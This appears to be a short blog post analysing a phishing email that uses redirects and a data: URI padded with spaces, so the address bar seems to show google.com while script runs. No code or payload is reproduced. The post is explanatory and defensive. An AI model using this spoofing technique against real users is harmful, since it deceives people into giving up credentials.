Remember a time where people said you should look at the address bar to verify whether or not it’s a phishing attempt? A friend of mine recently got an email which is fairly interesting to me. This attack provides a decent amount of SE to make a user think it’s a legit, correct, the green “padlock” isn’t there, but google.com is.
It all started with a email which looked to be fairly normal, the one problem with it is ofcourse is the Google attachment. I don’t use Google as a provider for this email and so having a Roundcube email client and Google attachment doesn’t work out. The attackers are just taking into account the majority of people will be using Google accounts and so it’s worth making something look like this.
The URL is redirected twice until it reaches its destination, pretty common with phishing attacks most likely so they can dynamically redirect if a site is reported on and falls down. The code here refreshes and uses the data: functionality that browsers have available. There are spaces from the google.com text to the <script> tags, this is to ensure that the browser shows only the Google text in the URL bar, making it deceptive to most people. The text in the URL isn’t actually the location, but infact code itself.
The final result? You’ve already seen it but it’s rather convincing to a person who isn’t to confident with computers. Maybe we need to have a look at modifying how data URI’s are used. Here’s a video showing it live.